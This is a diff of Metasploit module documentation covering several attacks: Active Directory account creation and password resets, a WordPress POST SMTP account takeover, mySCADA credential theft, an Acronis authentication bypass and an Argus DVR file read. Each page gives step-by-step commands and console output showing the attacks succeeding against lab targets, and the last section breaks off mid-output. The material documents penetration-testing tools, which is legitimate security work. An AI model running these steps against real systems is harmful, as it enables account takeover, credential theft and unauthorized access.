+After the user account is created, the password will be set for it. The `ACCOUNT_NAME` option must be set to the name of
+the account to create. The module will fail if the specified name is already in use.
+
+### DELETE_ACCOUNT
+
+Delete a user or computer account from the domain. This action requires that the `ACCOUNT_NAME` option be set.
+
+### LOOKUP_ACCOUNT
+
+Lookup a user or computer account in the domain. This action verifies that the specified account exists, and looks up
+its security ID (SID), which includes the relative ID (RID) as the last component.
+
+## Scenarios
+
+### Windows Server 2019
+
+First, a new computer account is created and its details are logged to the database.
+
+```
+msf6 auxiliary(admin/dcerpc/samr_account) > set RHOSTS 192.168.159.96
+RHOSTS => 192.168.159.96
+msf6 auxiliary(admin/dcerpc/samr_account) > set SMBUser aliddle
+SMBUser => aliddle
+msf6 auxiliary(admin/dcerpc/samr_account) > set SMBPass Password1
+SMBPass => Password1
+msf6 auxiliary(admin/dcerpc/samr_account) > show options
+
+Module options (auxiliary/admin/dcerpc/samr_account):
+
+   Name              Current Setting  Required  Description
+   ----              ---------------  --------  -----------
+   ACCOUNT _NAME                      no        The computer name
+   ACCOUNT_PASSWORD                   no        The password for the new computer
+   RHOSTS            192.168.159.96   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT             445              yes       The target port (TCP)
+   SMBDomain         .                no        The Windows domain to use for authentication
+   SMBPass           Password1        no        The password for the specified username
+   SMBUser           aliddle          no        The username to authenticate as
+
+
+Auxiliary action:
+
+   Name          Description
+   ----          -----------
+   ADD_COMPUTER  Add a computer account
+
+
+msf6 auxiliary(admin/dcerpc/samr_account) > run
+[*] Running module against 192.168.159.96
+
+[*] 192.168.159.96:445 - Using automatically identified domain: MSFLAB
+[+] 192.168.159.96:445 - Successfully created MSFLAB\DESKTOP-2X8F54QG$ with password MCoDkNALd3SdGR1GoLhqniEkWa8Me9FY
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/dcerpc/samr_account) > creds
+Credentials
+===========
+
+host            origin          service        public             private                           realm   private_type  JtR Format
+----            ------          -------        ------             -------                           -----   ------------  ----------
+192.168.159.96  192.168.159.96  445/tcp (smb)  DESKTOP-2X8F54QG$  MCoDkNALd3SdGR1GoLhqniEkWa8Me9FY  MSFLAB  Password
+
+msf6 auxiliary(admin/dcerpc/samr_account) >
+```
@@ -1,100 +0,0 @@
-## Vulnerable Application
-Add, lookup and delete computer accounts via MS-SAMR. By default standard active directory users can add up to 10 new
-computers to the domain. Administrative privileges however are required to delete the created accounts.
-
-## Verification Steps
-
-1. From msfconsole
-2. Do: `use auxiliary/admin/dcerpc/samr_computer`
-3. Set the `RHOSTS`, `SMBUser` and `SMBPass` options
-   1. Set the `COMPUTER_NAME` option for `DELETE_COMPUTER` and `LOOKUP_COMPUTER` actions
-4. Run the module and see that a new machine account was added
-
-## Options
-
-### SMBDomain
-
-The Windows domain to use for authentication. The domain will automatically be identified if this option is left in its
-default value.
-
-### COMPUTER_NAME
-
-The computer name to add, lookup or delete. This option is optional for the `ADD_COMPUTER` action, and required for the
-`LOOKUP_COMPUTER` and `DELETE_COMPUTER` actions.
-
-### COMPUTER_PASSWORD
-
-The password for the new computer. This option is only used for the `ADD_COMPUTER` action. If left blank, a random value
-will be generated.
-
-## Actions
-
-### ADD_COMPUTER
-
-Add a new computer to the domain. This action will fail with status `STATUS_DS_MACHINE_ACCOUNT_QUOTA_EXCEEDED` if the
-user has exceeded the maximum number of computer accounts that they are allowed to create.
-
-After the computer account is created, the password will be set for it. If `COMPUTER_NAME` is set, that value will be
-used and the module will fail if the selected name is already in use. If `COMPUTER_NAME` is *not* set, a random value
-will be used.
-
-### DELETE_COMPUTER
-
-Delete a computer from the domain. This action requires that the `COMPUTER_NAME` option be set.
-
-### LOOKUP_COMPUTER
-
-Lookup a computer in the domain. This action verifies that the specified computer exists, and looks up its security ID
-(SID), which includes the relative ID (RID) as the last component.
-
-## Scenarios
-
-### Windows Server 2019
-
-First, a new computer account is created and its details are logged to the database.
-
-```
-msf6 auxiliary(admin/dcerpc/samr_computer) > set RHOSTS 192.168.159.96
-RHOSTS => 192.168.159.96
-msf6 auxiliary(admin/dcerpc/samr_computer) > set SMBUser aliddle
-SMBUser => aliddle
-msf6 auxiliary(admin/dcerpc/samr_computer) > set SMBPass Password1
-SMBPass => Password1
-msf6 auxiliary(admin/dcerpc/samr_computer) > show options
-
-Module options (auxiliary/admin/dcerpc/samr_computer):
-
-   Name               Current Setting  Required  Description
-   ----               ---------------  --------  -----------
-   COMPUTER_NAME                       no        The computer name
-   COMPUTER_PASSWORD                   no        The password for the new computer
-   RHOSTS             192.168.159.96   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
-   RPORT              445              yes       The target port (TCP)
-   SMBDomain          .                no        The Windows domain to use for authentication
-   SMBPass            Password1        no        The password for the specified username
-   SMBUser            aliddle          no        The username to authenticate as
-
-
-Auxiliary action:
-
-   Name          Description
-   ----          -----------
-   ADD_COMPUTER  Add a computer account
-
-
-msf6 auxiliary(admin/dcerpc/samr_computer) > run
-[*] Running module against 192.168.159.96
-
-[*] 192.168.159.96:445 - Using automatically identified domain: MSFLAB
-[+] 192.168.159.96:445 - Successfully created MSFLAB\DESKTOP-2X8F54QG$ with password MCoDkNALd3SdGR1GoLhqniEkWa8Me9FY
-[*] Auxiliary module execution completed
-msf6 auxiliary(admin/dcerpc/samr_computer) > creds
-Credentials
-===========
-
-host            origin          service        public             private                           realm   private_type  JtR Format
----            ------          -------        ------             -------                           -----   ------------  ----------
-192.168.159.96  192.168.159.96  445/tcp (smb)  DESKTOP-2X8F54QG$  MCoDkNALd3SdGR1GoLhqniEkWa8Me9FY  MSFLAB  Password
-
-msf6 auxiliary(admin/dcerpc/samr_computer) >
-```
@@ -0,0 +1,105 @@
+## Vulnerable Application
+
+The POST SMTP WordPress plugin prior to 2.8.7 is affected by a privilege
+escalation where an unauthenticated user is able to reset the password
+of an arbitrary user. This is done by requesting a password reset, then
+viewing the latest email logs to find the associated password reset email.
+
+### Install
+
+1. Create `wp_post_smtp_acct_takeover.docker-compose.yml` with the content:
+```
+version: '3.1'
+
+services:
+  wordpress:
+    image: wordpress:latest
+    restart: always
+    ports:
+      - 5555:80
+    environment:
+      WORDPRESS_DB_HOST: db
+      WORDPRESS_DB_USER: chocapikk
+      WORDPRESS_DB_PASSWORD: dummy_password
+      WORDPRESS_DB_NAME: exploit_market
+    mem_limit: 512m
+    volumes:
+      - wordpress:/var/www/html
+
+  db:
+    image: mysql:5.7
+    restart: always
+    environment:
+      MYSQL_DATABASE: exploit_market
+      MYSQL_USER: chocapikk
+      MYSQL_PASSWORD: dummy_password
+      MYSQL_RANDOM_ROOT_PASSWORD: '1'
+    volumes:
+      - db:/var/lib/mysql
+
+volumes:
+  wordpress:
+  db:
+
+```
+2. `docker-compose -f wp_post_smtp_acct_takeover.docker-compose.yml up`
+3. `wget https://downloads.wordpress.org/plugin/post-smtp.2.8.6.zip`
+4. `unzip post-smtp.2.8.6.zip`
+5. `docker cp post-smtp <wordpress_container_id>:/var/www/html/wp-content/plugins`
+6. Complete the setup of wordpress
+7. Enable the post-smtp plugin, select "default" for the SMTP service
+  1. Complete the setup using random information, it isn't validated.
+8. Update permalink structure per https://github.com/rapid7/metasploit-framework/pull/18164#issuecomment-1623744244
+  1. Settings -> Permalinks -> Permalink structure -> Select "Post name" -> Save Changes.
+
+
+## Verification Steps
+
+1. Install the vulnerable plugin
+2. Start msfconsole
+3. Do: `use auxiliary/admin/http/wp_post_smtp_acct_takeover`
+4. Do: `set rhost 127.0.0.1`
+5. Do: `set rport 5555`
+6. Do: `set ssl false`
+7. Do: `set username <username>`
+8. Do: `set verbose true`
+9. Do: `run`
+10. Visit the output URL to reset the user's password.
+
+## Options
+
+### USERNAME
+
+The username to perform a password reset against
+
+## Scenarios
+
+### Wordpress 6.6.2 with SMTP Post 2.8.6 on Docker
+
+```
+msf6 > use auxiliary/admin/http/wp_post_smtp_acct_takeover
+msf6 auxiliary(admin/http/wp_post_smtp_acct_takeover) > set rhost 127.0.0.1
+rhost => 127.0.0.1
+msf6 auxiliary(admin/http/wp_post_smtp_acct_takeover) > set rport 5555
+rport => 5555
+msf6 auxiliary(admin/http/wp_post_smtp_acct_takeover) > set ssl false
+ssl => false
+msf6 auxiliary(admin/http/wp_post_smtp_acct_takeover) > set username admin
+username => admin
+msf6 auxiliary(admin/http/wp_post_smtp_acct_takeover) > set verbose true
+verbose => true
+msf6 auxiliary(admin/http/wp_post_smtp_acct_takeover) > run
+[*] Running module against 127.0.0.1
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking /wp-content/plugins/post-smtp/readme.txt
+[*] Found version 2.8.6 in the plugin
+[+] The target appears to be vulnerable.
+[*] Attempting to Registering token fUefO7U12dXtb0DM on device GP3tOFuMfFErw
+[+] Succesfully created token: fUefO7U12dXtb0DM
+[*] Requesting logs
+[*] Requesting email content from logs for ID 4
+[+] Full text of log saved to: /home/mtcyr/.msf4/loot/20241029142103_default_127.0.0.1_wordpress.post_s_367186.txt
+[+] Reset URL: http://127.0.0.1:5555/wp-login.php?action=rp&key=4kxMwfuvyQtcUDVrh985&login=admin&wp_lang=en_US
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,39 @@
+## Introduction
+
+Allows changing or resetting users' passwords over the LDAP protocol (particularly for Active Directory).
+
+"Changing" refers to situations where you know the value of the existing password, and send that to the server as part of the password modification.
+"Resetting" refers to situations where you may not know the value of the existing password, but by virtue of your permissions over the target account, you can force-change the password without necessarily knowing it.
+
+Note that users can typically not reset their own passwords (unless they have very high privileges), but can usually change their password as long as they know the existing one.
+
+This module works with existing sessions (or relaying), especially for Resetting, wherein the target's password is not required.
+
+## Actions
+
+- `RESET` - Reset the target's password without knowing the existing one (requires appropriate permissions)
+- `CHANGE` - Change the user's password, knowing the existing one.
+
+## Options
+
+The required options are based on the action being performed:
+
+- When resetting a password, you must specify the `TARGET_USER`
+- When changing a password, you must specify the `USERNAME` and `PASSWORD`, even if using an existing session (since the API requires both of these to be specified, even for open LDAP sessions)
+- The `NEW_PASSWORD` option must always be provided
+
+**USERNAME**
+
+The username to use to authenticate to the server. Required for changing a password, even if using an existing session.
+
+**PASSWORD**
+
+The password to use to authenticate to the server, prior to performing the password modification. Required for changing a password, even if using an existing session (since the server requires proof that you know the existing password).
+
+**TARGET_USER**
+
+For resetting passwords, the user account for which to reset the password. The authenticated account (username) must have privileges over the target user (e.g. Ownership, or the `User-Force-Change-Password` extended right)
+
+**NEW_PASSWORD**
+
+The new password to set.
@@ -62,14 +62,14 @@ PropagationFlags      : None

 ## Module usage

-The `admin/dcerpc/samr_computer` module is generally used to first create a computer account, which requires no permissions:
+The `admin/dcerpc/samr_account` module is generally used to first create a computer account, which by default, all user accounts in a domain can perform:

 1. From msfconsole
-2. Do: `use auxiliary/admin/dcerpc/samr_computer`
+2. Do: `use auxiliary/admin/dcerpc/samr_account`
 3. Set the `RHOSTS`, `SMBUser` and `SMBPass` options
-   a. For the `ADD_COMPUTER` action, if you don't specify `COMPUTER_NAME` or `COMPUTER_PASSWORD` - one will be generated automatically
-   b. For the `DELETE_COMPUTER` action, set the `COMPUTER_NAME` option
-   c. For the `LOOKUP_COMPUTER` action, set the `COMPUTER_NAME` option
+   a. For the `ADD_COMPUTER` action, if you don't specify `ACCOUNT_NAME` or `ACCOUNT_PASSWORD` - one will be generated automatically
+   b. For the `DELETE_ACCOUNT` action, set the `ACCOUNT_NAME` option
+   c. For the `LOOKUP_ACCOUNT` action, set the `ACCOUNT_NAME` option
 4. Run the module and see that a new machine account was added

 Then the `auxiliary/admin/ldap/rbcd` can be used:
@@ -121,19 +121,30 @@ with the Service for User (S4U) Kerberos extension.
 First create the computer account:

 ```msf
-msf6 auxiliary(admin/dcerpc/samr_computer) > show options
+msf6 auxiliary(admin/dcerpc/samr_account) > show options

-Module options (auxiliary/admin/dcerpc/samr_computer):
+   Name              Current Setting  Required  Description
+   ----              ---------------  --------  -----------
+   ACCOUNT_NAME                       no        The account name
+   ACCOUNT_PASSWORD                   no        The password for the new account

-   Name               Current Setting  Required  Description
-   ----               ---------------  --------  -----------
-   COMPUTER_NAME                       no        The computer name
-   COMPUTER_PASSWORD                   no        The password for the new computer
-   RHOSTS                              yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
-   RPORT              445              yes       The target port (TCP)
-   SMBDomain          .                no        The Windows domain to use for authentication
-   SMBPass                             no        The password for the specified username
-   SMBUser                             no        The username to authenticate as
+
+   Used when connecting via an existing SESSION:
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SESSION                   no        The session to run this module on
+
+
+   Used when making a new connection via RHOSTS:
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   RHOSTS                      no        The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT      445              yes       The target port (TCP)
+   SMBDomain  .                no        The Windows domain to use for authentication
+   SMBPass                     no        The password for the specified username
+   SMBUser                     no        The username to authenticate as


 Auxiliary action:
@@ -143,13 +154,13 @@ Auxiliary action:
   ADD_COMPUTER  Add a computer account


-msf6 auxiliary(admin/dcerpc/samr_computer) > set RHOSTS 192.168.159.10
+msf6 auxiliary(admin/dcerpc/samr_account) > set RHOSTS 192.168.159.10
 RHOSTS => 192.168.159.10
-msf6 auxiliary(admin/dcerpc/samr_computer) > set SMBUser sandy
+msf6 auxiliary(admin/dcerpc/samr_account) > set SMBUser sandy
 SMBUser => sandy
-msf6 auxiliary(admin/dcerpc/samr_computer) > set SMBPass Password1!
+msf6 auxiliary(admin/dcerpc/samr_account) > set SMBPass Password1!
 SMBPass => Password1!
-msf6 auxiliary(admin/dcerpc/samr_computer) > run
+msf6 auxiliary(admin/dcerpc/samr_account) > run
 [*] Running module against 192.168.159.10

 [*] 192.168.159.10:445 - Using automatically identified domain: MSFLAB
@@ -157,7 +168,7 @@ msf6 auxiliary(admin/dcerpc/samr_computer) > run
 [+] 192.168.159.10:445 -   Password: A2HPEkkQzdxQirylqIj7BxqwB7kuUMrT
 [+] 192.168.159.10:445 -   SID:      S-1-5-21-3402587289-1488798532-3618296993-1655
 [*] Auxiliary module execution completed
-msf6 auxiliary(admin/dcerpc/samr_computer) > use auxiliary/admin/ldap/rbcd
+msf6 auxiliary(admin/dcerpc/samr_account) > use auxiliary/admin/ldap/rbcd
 ```

 Now use the RBCD module to read the current value of `msDS-AllowedToActOnBehalfOfOtherIdentity`:
@@ -181,7 +192,7 @@ msf6 auxiliary(admin/ldap/rbcd) > read
 [*] Auxiliary module execution completed
 ```

-Writing a new `msDS-AllowedToActOnBehalfOfOtherIdentity` value using the computer account created by `admin/dcerpc/samr_computer`:
+Writing a new `msDS-AllowedToActOnBehalfOfOtherIdentity` value using the computer account created by `admin/dcerpc/samr_account`:

 ```msf
 msf6 auxiliary(admin/ldap/rbcd) > set DELEGATE_FROM DESKTOP-QLSTR9NW$
@@ -0,0 +1,64 @@
+## Vulnerable Application
+
+**Vulnerability Description**
+
+This module exploits two vulnerabilities (CVE-2025-24865 & CVE-2025-22896) in mySCADA MyPRO Manager <= v1.3 to retrieve the configured
+credentials for the mail server.
+
+The administrative web interface has certain features where credentials are required to be accessed, but the implementation is flawed,
+allowing to bypass the requirement. Other important administrative features do not require credentials at all, allowing an unauthenticated
+remote attacker to perform privileged actions. These issues are tracked through CVE-2025-24865.
+Another vulnerability, tracked through CVE-2025-22896, is related to the cleartext storage of various credentials by the application.
+
+One way how these issues can be exploited is to allow an unauthenticated remote attacker to retrieve the cleartext credentials of the mail
+server that is configured by the product, which this module does.
+
+Versions <= 1.3 are affected. CISA published [ICSA-25-044-16](https://www.cisa.gov/news-events/ics-advisories/icsa-25-044-16) to cover
+the security issues.
+
+**Vulnerable Application Installation**
+
+A trial version of the software can be obtained from [the vendor](https://www.myscada.org/mypro/).
+
+**Successfully tested on**
+
+- mySCADA MyPRO Manager 1.3 on Windows 11 (22H2)
+
+## Verification Steps
+
+1. Install the application
+2. After installation, reboot the system and wait some time until a runtime (e.g., 9.2.1) has been fetched and installed.
+3. Start `msfconsole` and run the following commands:
+
+```
+msf6 > use auxiliary/admin/scada/mypro_mgr_creds 
+msf6 auxiliary(admin/scada/mypro_mgr_creds) > set RHOSTS <IP>
+msf6 auxiliary(admin/scada/mypro_mgr_creds) > run 
+```
+
+## Scenarios
+
+Running the module against MyPRO Manager v1.3 on Windows 11, should result in an output similar to the
+following:
+
+```
+msf6 auxiliary(admin/scada/mypro_mgr_creds) > run
+[*] Running module against 192.168.1.78
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
+[+] Mail server credentials retrieved:
+[+] Host: smtp.example.com
+[+] Port: 993
+[+] Auth Type: login
+[+] User: user
+[+] Password: SuperS3cr3t!
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/scada/mypro_mgr_creds) > creds
+Credentials
+===========
+
+host          origin        service           public  private       realm  private_type  JtR Format  cracked_password
+----          ------        -------           ------  -------       -----  ------------  ----------  ----------------
+192.168.1.78  192.168.1.78  34022/tcp (http)  user    SuperS3cr3t!         Password
+```
@@ -0,0 +1,46 @@
+## Introduction
+
+Allows changing or resetting users' passwords.
+
+"Changing" refers to situations where you know the value of the existing password, and send that to the server as part of the password modification.
+"Resetting" refers to situations where you may not know the value of the existing password, but by virtue of your permissions over the target account, you can force-change the password without necessarily knowing it.
+
+Note that users can typically not reset their own passwords (unless they have very high privileges).
+
+This module works with existing sessions (or relaying), especially for Reset use cases, wherein the target's password is not required.
+
+## Actions
+
+- `RESET` - Reset the target's password without knowing the existing one (requires appropriate permissions). New AES kerberos keys will be generated.
+- `RESET_NTLM` - Reset the target's NTLM hash, without knowing the existing password. AES kerberos authentication will not work until a standard password change occurs.
+- `CHANGE` - Change the password, knowing the existing one. New AES kerberos keys will be generated.
+- `CHANGE_NTLM` - Change the password to a NTLM hash value, knowing the existing password. AES kerberos authentication will not work until a standard password change occurs.
+
+## Options
+
+The required options are based on the action being performed:
+
+- When resetting a password, you must specify the `TARGET_USER`
+- When changing a password, you must specify the `SMBUser` and `SMBPass`, even if using an existing session (since the API requires both of these to be specified, even for open SMB sessions)
+- When resetting or changing a password, you must specify `NEW_PASSWORD`
+- When resetting or changing an NTLM hash, you must specify `NEW_NTLM`
+
+**SMBUser**
+
+The username to use to authenticate to the server. Required for changing a password, even if using an existing session.
+
+**SMBPass**
+
+The password to use to authenticate to the server, prior to performing the password modification. Required for changing a password, even if using an existing session (since the server requires proof that you know the existing password).
+
+**TARGET_USER**
+
+For resetting passwords, the user account for which to reset the password. The authenticated account (SMBUser) must have privileges over the target user (e.g. Ownership, or the `User-Force-Change-Password` extended right)
+
+**NEW_PASSWORD**
+
+The new password to set for `RESET` and `CHANGE` actions. 
+
+**NEW_NTLM**
+
+The new NTLM hash to set for `RESET_NTLM` and `CHANGE_NTLM` actions. This can either be an NT hash, or a colon-delimited NTLM hash.
@@ -0,0 +1,205 @@
+## Vulnerable Application
+Acronis Cyber Protect or Backup is an enterprise backup/recovery solution for all, compute, storage and application resources.
+Businesses and Service Providers are using it to protect and backup all IT assets in their IT environment.
+
+This module exploits an authentication bypass vulnerability at the Acronis Cyber Protect appliance which,
+in its default configuration, allows the anonymous registration of new backup/protection agents on new endpoints.
+This API endpoint also generates bearer tokens which the agent then uses to authenticate to the appliance.
+As the management web console is running on the same port as the API for the agents,
+this bearer token is also valid for any actions on the web console.
+This allows an attacker with network access to the appliance to start the registration of a new agent,
+retrieve a bearer token that provides admin access to the available functions in the web console.
+
+This module will gather all machine info (endpoints) configured and managed by the appliance.
+This information can be used in a subsequent attack that exploits this vulnerability to execute arbitrary commands
+on both the managed endpoint and the appliance itself.
+This exploit is covered in another module `exploit/multi/acronis_cyber_protect_unauth_rce_cve_2022_3405`.
+
+Acronis Cyber Protect 15 (Windows, Linux) before build 29486 and
+Acronis Cyber Backup 12.5 (Windows, Linux) before build 16545 are vulnerable.
+
+The following releases were tested.
+
+**Acronis Cyber Protect 15  ISO appliances:**
+* Acronis Cyber Protect 15 Build 28503
+* Acronis Cyber Protect 15 Build 27009
+* Acronis Cyber Protect 15 Build 26981
+* Acronis Cyber Protect 15 Build 26172
+
+**Acronis Cyber Protect 12.5  ISO appliances:**
+* Acronis Cyber Protect 12.5 Build 16428
+* Acronis Cyber Protect 12.5 Build 16386
+* Acronis Cyber Protect 12.5 Build 14330
+* Acronis Cyber Protect 12.5 Build 11010
+
+## Installation steps to install the Acronis Cyber Protect/Backup appliance
+* Install the virtualization engine VMware Fusion on your preferred platform.
+* [Install VMware Fusion on MacOS](https://knowledge.broadcom.com/external/article/315638/download-and-install-vmware-fusion.html).
+* [Download ISO Image](https://care.acronis.com/s/article/71847-Acronis-Cyber-Protect-Links-to-download-installation-files?language=en_US).
+* Install the Acronis iso image in your virtualization engine by unzipping the appliance image and import the `ovf` image.
+* During the boot, select `Install appliance` and  configure the installation settings such as setting the root password and IP address
+* using the option `change installation settings`.
+* Boot up the VM and should be able to access the Acronis Cyber Protect/Backup appliance either thru the console, `ssh` on port `22`
+* via the `webui` via `http://your_ip:9877`.
+* Ensure that you have registered yourself on the Acronis Web site and applied for the 30-days trial for Acronis Cyber Protect.
+* Login into the appliance via the `webui`.
+* Follow the license instructions to apply your 30-day trial license.
+
+You are now ready to test the module.
+
+## Verification Steps
+- [ ] Start `msfconsole`
+- [ ] `auxiliary/gather/acronis_cyber_protect_machine_info_disclosure`
+- [ ] `set rhosts <ip-target>`
+- [ ] `run`
+- [ ] you should get a list of all endpoints that are registered at the appliance.
+
+## Options
+### OUTPUT
+You can use option `table` to print output of the gather info to the console (default).
+Choosing option `json` will store all information at a file in `json` format at the loot directory.
+You can use this file in combination with `jq` for offline queries and processing.
+
+## Scenarios
+```msf
+msf6 auxiliary(gather/acronis_cyber_protect_machine_info_disclosure) > info
+
+       Name: Acronis Cyber Protect/Backup machine info disclosure
+     Module: auxiliary/gather/acronis_cyber_protect_machine_info_disclosure
+    License: Metasploit Framework License (BSD)
+       Rank: Excellent
+
+Provided by:
+  h00die-gr3y <h00die.gr3y@gmail.com>
+  Sandro Tolksdorf of usd AG.
+
+Module side effects:
+ artifacts-on-disk
+ ioc-in-logs
+
+Module stability:
+ crash-safe
+
+Module reliability:
+ repeatable-session
+
+Check supported:
+  Yes
+
+Basic options:
+  Name       Current Setting  Required  Description
+  ----       ---------------  --------  -----------
+  OUTPUT     table            yes       Output format to use (Accepted: table, json)
+  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+  RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-
+                                        metasploit.html
+  RPORT      9877             yes       The target port (TCP)
+  SSL        true             no        Negotiate SSL/TLS for outgoing connections
+  TARGETURI  /                yes       The URI of the vulnerable Acronis Cyber Protect/Backup instance
+  VHOST                       no        HTTP server virtual host
+
+Description:
+  Acronis Cyber Protect or Backup is an enterprise backup/recovery solution for all,
+  compute, storage and application resources. Businesses and Service Providers are using it
+  to protect and backup all IT assets in their IT environment.
+  This module exploits an authentication bypass vulnerability at the Acronis Cyber Protect
+  appliance which, in its default configuration, allows the anonymous registration of new
+  backup/protection agents on new endpoints. This API endpoint also generates bearer tokens
+  which the agent then uses to authenticate to the appliance.
+  As the management web console is running on the same port as the API for the agents, this
+  bearer token is also valid for any actions on the web console. This allows an attacker
+  with network access to the appliance to start the registration of a new agent, retrieve
+  a bearer token that provides admin access to the available functions in the web console.
+
+  This module will gather all machine info (endpoints) configured and managed by the appliance.
+  This information can be used in a subsequent attack that exploits this vulnerability to
+  execute arbitrary commands on both the managed endpoint and the appliance which is covered
+  in another module `exploit/multi/acronis_cyber_protect_unauth_rce_cve_2022_3405`.
+
+  Acronis Cyber Protect 15 (Windows, Linux) before build 29486 and
+  Acronis Cyber Backup 12.5 (Windows, Linux) before build 16545 are vulnerable.
+
+References:
+  https://nvd.nist.gov/vuln/detail/CVE-2022-30995
+  https://nvd.nist.gov/vuln/detail/CVE-2022-3405
+  https://herolab.usd.de/security-advisories/usd-2022-0008/
+  https://attackerkb.com/topics/27RudJXbN4/cve-2022-30995
+
+View the full module info with the info -d command.
+```
+### Acronis Cyber Backup 12.5 build 14330 VMware appliance
+```msf
+msf6 auxiliary(gather/acronis_cyber_protect_machine_info_disclosure) > set rhosts 192.168.201.6
+rhosts => 192.168.201.6
+msf6 auxiliary(gather/acronis_cyber_protect_machine_info_disclosure) > run
+
+[*] Running module against 192.168.201.6
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated.
+[*] Retrieve the first access token.
+[*] Register a dummy backup agent.
+[*] Dummy backup agent registration is successful.
+[*] Retrieve the second access token.
+[+] The target appears to be vulnerable. Acronis Cyber Protect/Backup 12.5.14330
+[*] Retrieve all managed endpoint configuration details registered at the Acronis Cyber Protect/Backup appliance.
+[*] List the managed endpoints registered at the Acronis Cyber Protect/Backup appliance.
+[*] ----------------------------------------
+[+] hostId: 28BAFD9F-F9F1-481F-A970-1A6ED70736AC
+[+] parentId: phm-group.7C2057CC-8D32-40CA-9B83-4A8E73078F7F.disks
+[+] key: phm.0CA16CD4-1C6D-44D2-BEF1-B9F146005EE1@28BAFD9F-F9F1-481F-A970-1A6ED70736AC.disks
+[*] type: machine
+[*] hostname: WIN-BJDNH44EEDB
+[*] IP: 192.168.201.5
+[*] OS: Microsoft Windows Server 2019 Standard
+[*] ARCH: windows
+[*] ONLINE: false
+[*] ----------------------------------------
+[+] hostId: 345C3F1E-92C3-4E92-8EF8-AC6BF136BB83
+[+] parentId: phm-group.7C2057CC-8D32-40CA-9B83-4A8E73078F7F.disks
+[+] key: phm.F70D1B08-5097-4CE5-8E22-F9E0DB75401F@345C3F1E-92C3-4E92-8EF8-AC6BF136BB83.disks
+[*] type: machine
+[*] hostname: AcronisAppliance-AC319
+[*] IP: 192.168.201.6
+[*] OS: GNU/Linux
+[*] ARCH: linux
+[*] ONLINE: true
+[*] Auxiliary module execution completed
+```
+### Acronis Cyber Backup 15 build 27009 VMware appliance
+```msf
+msf6 auxiliary(gather/acronis_cyber_protect_machine_info_disclosure) > run
+[*] Running module against 192.168.201.6
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Retrieve the first access token.
+[*] Register a dummy backup agent.
+[*] Dummy backup agent registration is successful.
+[*] Retrieve the second access token.
+[+] The target appears to be vulnerable. Acronis Cyber Protect/Backup 15.0.27009
+[*] Retrieve all managed endpoint configuration details registered at the Acronis Cyber Protect/Backup appliance.
+[*] List the managed endpoints registered at the Acronis Cyber Protect/Backup appliance.
+[*] ----------------------------------------
+[+] hostId: D287E868-EDBB-4FE9-85A9-F928AA10EE5D
+[+] parentId: 00000000-0000-0000-0000-000000000000
+[+] key: phm.EA9A6E26-38B5-4727-9957-FD7CDD7BF2CC@D287E868-EDBB-4FE9-85A9-F928AA10EE5D.disks
+[*] type: machine
+[*] hostname: AcronisAppliance-FCD94
+[*] IP: 192.168.201.6
+[*] OS: Linux: CentOS Linux release 7.6.1810 (Core)
+[*] ARCH: linux
+[*] ONLINE: true
+[*] ----------------------------------------
+[+] hostId: C0FBDC6F-A5FE-4710-ADE8-99B3F8A7CE1E
+[+] parentId: 00000000-0000-0000-0000-000000000000
+[+] key: phm.1100195A-112E-4904-A933-264C2D12A4A5@C0FBDC6F-A5FE-4710-ADE8-99B3F8A7CE1E.disks
+[*] type: machine
+[*] hostname: victim.evil.corp
+[*] IP: 192.168.201.2
+[*] OS: Microsoft Windows Server 2022 Standard
+[*] ARCH: windows
+[*] ONLINE: false
+[*] Auxiliary module execution completed
+```
+
+## Limitations
+No limitations.
@@ -0,0 +1,46 @@
+## Vulnerable Application
+This module leverages an issue with how the `RESULTPAGE` parameter within `WEBACCCOUNT.cgi` handles file referencing and as a result is vulnerable to Local File Inclusion (LFI). 
+
+## Options
+To successfully read contents of the Windows file system you must set the full file path of the file you want to check using `TARGET_FILE` (not including the drive letter prefix). 
+As a first run it is recommended to try leaking `Windows/system.ini` as a validation exercise on your first module run.
+
+## Testing
+To setup a test environment, the following steps can be performed:
+1. Set up a Windows operating system (any OS that has C:\Windows\system.ini)
+2. Download the [Argus DVR 4 Software](https://download.cnet.com/argus-surveillance-dvr/3000-2348_4-10576796.html)
+3. Run the Argus software and a webpage running on port 8080 will appear. Take note of the machine's IP
+4. On your attacker machine follow the verification steps below.
+
+## Verification Steps
+1. start msfconsole
+2. `use auxiliary/gather/argus_dvr4_lfi_cve_2018_15745`
+3. `set RHOSTS <TARGET_IP_ADDRESS>`
+4. `set TARGET_FILE Windows/system.ini`
+5. `run`
+
+## Scenarios
+### Utilising Argus DVR 4 CVE-2018-15745 to Leak DVRParams.ini
+```
+msf6 > use auxiliary/gather/argus_dvr_4_lfi_cve_2018_15745 
+msf6 auxiliary(gather/argus_dvr_4_lfi_cve_2018_15745) > set RHOSTS 192.168.1.15
+RHOSTS => 192.168.1.15
+msf6 auxiliary(gather/argus_dvr_4_lfi_cve_2018_15745) > set TARGET_FILE ProgramData/PY_Software/Argus Surveillance DVR/DVRParams.ini
+TARGET_FILE => ProgramData/PY_Software/Argus Surveillance DVR/DVRParams.ini
+msf6 auxiliary(gather/argus_dvr_4_lfi_cve_2018_15745) > run
+[*] Running module against 192.168.1.15
+[*] Sending request to 192.168.1.15:8080 for file: ProgramData/PY_Software/Argus%20Surveillance%20DVR/DVRParams.ini
+[+] File retrieved successfully!
+[Main]
+ServerName=
+ServerLocation=
+ServerDescription=
+ReadH=0
+UseDialUp=0
+DialUpConName=
+DialUpDisconnectWhenDone=0
+DIALUPUSEDEFAULTS" checked checked
+
